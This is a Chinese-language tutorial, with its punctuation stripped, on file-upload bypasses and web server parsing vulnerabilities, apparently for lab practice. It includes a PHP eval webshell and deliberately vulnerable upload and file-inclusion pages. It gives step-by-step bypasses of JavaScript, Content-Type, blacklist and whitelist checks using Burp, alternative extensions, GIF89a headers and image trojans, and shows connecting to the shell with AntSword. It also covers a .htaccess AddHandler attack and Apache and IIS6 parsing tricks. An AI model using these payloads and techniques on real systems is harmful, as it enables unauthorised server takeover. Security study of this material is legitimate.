一、文件上传绕过方式准备一个想要上传的木马文件muma.php?phpeval($_POST[pass]);?1.1客户端 JavaScript 校验绕过原理前端 JS 判断文件后缀不安全。绕过方法第一种浏览器禁用 JavaScriptF12打开开发者工具-设置-disable javascript-刷新页面后上传第二种BurpSuite 抓包修改文件后缀将下方的代码写入uploads_js.html!DOCTYPEhtmlhtmlheadmetacharsetutf-8titleupload-1 前端JS验证/titlescripttypetext/javascriptfunctioncheckFile(){varfiledocument.getElementsByName(upfile)[0].value;if(filenull||file){alert(请选择文件);returnfalse;}// 只允许 jpgif(!file.match(/.jpg$/i)){alert(只允许上传jpg文件);returnfalse;}}/script/headbodyh3upload-1 前端JS绕过/h3formactionupload1.phpmethodpostenctypemultipart/form-dataonsubmitreturncheckFile()选择文件inputtypefilenameupfilebrinputtypesubmitvalue上传/form/body/html再在同目录下写上传文件upload1.php?phpif($_FILES[upfile][error]0){$filename$_FILES[upfile][name];move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$filename);echo上传成功路径uploads/.$filename;}else{echo上传失败;}?在burp suite中抓包上传文件的时候burp的intercept必须是on 的状态抓到的post包找到content-disposition:form-data;name‘file’;filename传入的图片名.jpg’将“传入的文件名.jpg改为”muma.php-forword此时就能成功上传木马文件绕过js 校验总结完全不可靠只要能抓包就能绕过是最基础的上传漏洞1.2服务端 Content-Type 校验绕过原理后端校验Content-Type为图片类型。绕过方法在根目录下写入upload_content_type.html文件!DOCTYPEhtmlhtmlheadmetacharsetutf-8titleupload-2 Content-Type验证/title/headbodyh3upload-2 Content-Type绕过/h3formactionupload2.phpmethodpostenctypemultipart/form-data选择文件inputtypefilenameupfilebrinputtypesubmitvalue上传/form/body/html同目录下写upload2.php?php$type$_FILES[upfile][type];// 只允许图片类型if($typeimage/jpeg||$typeimage/png||$typeimage/gif){$filename$_FILES[upfile][name];move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$filename);echo上传成功路径uploads/.$filename;}else{echo只能上传图片;}?Burp抓包将Content-Type: application/octet-streamphp默认修改成Content-Type: image/jgep再点击forward,此时上传成功在文件内容开头加GIF89a伪装成gif图片intercept on-off,上传成功总结不可靠改一个请求头就能绕过1.3黑名单校验绕过原理禁止特定后缀但规则不全。可绕过后缀php3、php4、php5、phtml、cer、cdx写一个禁止传php后缀的php文件?phpheader(Content-type:text/html;charsetutf-8);$filename$_FILES[upfile][name];$extsubstr($filename,strrpos($filename,.)1);// 黑名单只禁止 php$black_listarray(php);if(in_array(strtolower($ext),$black_list)){echo禁止上传 .php 文件;exit;}move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$filename);echo上传成功路径uploads/.$filename;?html文件!DOCTYPEhtmlhtmlheadmetacharsetutf-8title实操4黑名单绕过/title/headbodyh3实操4黑名单绕过只禁止 .php/h3formactionupload4.phpmethodpostenctypemultipart/form-data选择文件inputtypefilenameupfilebrinputtypesubmitvalue上传/form/body/html方法将muma.php改为muma.php3,就可以直接上传或者上传一个1.jpg文件burp抓包在post请求中将文件名改成muma.php3,或其他可执行后缀-intercept off-上传成功apache会自动解析为php执行总结黑名单是最坑的防护设计无法覆盖所有可执行后缀实战中容易被绕过1.4白名单校验绕过原理只允许.jpg .png .gif等图片后缀最安全。绕过条件配合文件包含漏洞组合利用绕过。搭建白名单上传upload8.html页面!DOCTYPEhtmlhtmlheadmetacharsetutf-8title实操8白名单文件包含/title/headbodyh3实操8白名单 文件包含/h3formactionupload8.phpmethodpostenctypemultipart/form-data选择文件inputtypefilenameupfilebrinputtypesubmitvalue上传/form/body/html搭建一个只允许图片通过的upload8.php页面?phpheader(Content-type:text/html;charsetutf-8);$extpathinfo($_FILES[upfile][name],PATHINFO_EXTENSION);if(strtolower($ext)!jpg){echo只允许 JPG;exit;}move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$_FILES[upfile][name]);echo上传成功uploads/.$_FILES[upfile][name];?搭建一个文件包含漏洞页面?php// 文件包含漏洞$file$_GET[file];include($file);?图片马制作思路方法一准备一张正常图片1.jpg和木马文件muma.php在cmd中copy /b test.jpg muma.php muma.jpg,这就能得到图片马方法二在之前写好的muma.php文件前插入GIF89a保存为muma.jpg文件访问http://localhost/upload8.html上传图片马白名单没有识别到其中的木马允许上传再访问http://localhost/include.php?filemuma.jpg,这一步是用文件包含漏洞将图片当作php执行打开蚁剑-点添加-URL填http://localhost/include.php?fileuploads/shell.jpg密码填pass,点测试连接显示连接成功成功拿到网站权限总结白名单 文件包含是实战中最常用的组合漏洞即使是严格的白名单校验也能被攻破。二、文件解析漏洞高频考点2.1Apache 解析漏洞特性从后往前识别后缀不认识的后缀就跳过。例如shell.php.xxx → 不认识xxx,就当作 PHP 执行。前端upload5.html!DOCTYPEhtmlhtmlheadmetacharsetutf-8title实操5Apache解析漏洞/title/headbodyh3实操5Apache 解析漏洞/h3formactionupload5.phpmethodpostenctypemultipart/form-data选择文件inputtypefilenameupfilebrinputtypesubmitvalue上传/form/body/html写禁止php通过的upload5.php?phpheader(Content-type:text/html;charsetutf-8);$filename$_FILES[upfile][name];$extpathinfo($filename,PATHINFO_EXTENSION);// 黑名单只禁 php$black_listarray(php);if(in_array(strtolower($ext),$black_list)){echo禁止上传 .php 文件;exit;}move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$filename);echo上传成功路径uploads/.$filename;?绕过方法:一、上传文件名为muma.php.abc后缀为任意不认识的字符串二、用burp suite抓包将任意文件名改成muma.php.xxx再放行上传成功2.2.htaccess 攻击创建upload6.html!DOCTYPEhtmlhtmlheadmeta charsetutf-8title实操6.htaccess 绕过/title/headbodyh3实操6.htaccess 绕过/h3form actionupload6.phpmethodpostenctypemultipart/form-data选择文件input typefilenameupfilebrinput typesubmitvalue上传/form/body/html创建允许.htaccess通过的upload6.php?phpheader(Content-type:text/html;charsetutf-8);$filename$_FILES[upfile][name];$extstrtolower(pathinfo($filename,PATHINFO_EXTENSION));// 白名单允许 jpg 和 无后缀文件.htaccess 无后缀$allowarray(jpg,jpeg,png,gif);// 重点允许上传 .htaccess特殊文件名if($filename.htaccess){move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$filename);echo上传成功uploads/.htaccess;exit;}// 其他文件必须是图片if(!in_array($ext,$allow)){echo只允许图片;exit;}move_uploaded_file($_FILES[upfile][tmp_name],uploads/.$filename);echo上传成功uploads/.$filename;?创建upload6.htaccessAddHandler application/x-httpd-php.jpg先上传.htaccess可以让服务器把后面上传的图片当 PHP 执行上传后再上传图片马muma.jpg访问muma.jpg即可被当作 PHP 执行。2.3. IIS6 解析漏洞原理IIS6.0 存在两个经典解析漏洞实战中仍有遇到分号截断、目录解析绕过方法1.分号截断遇到分号 ; 会 截断后缀只认后面的muma.jpg;.php → 当作 jpg 执行2.目录解析新建xxx.php目录目录内所有文件当作 php执行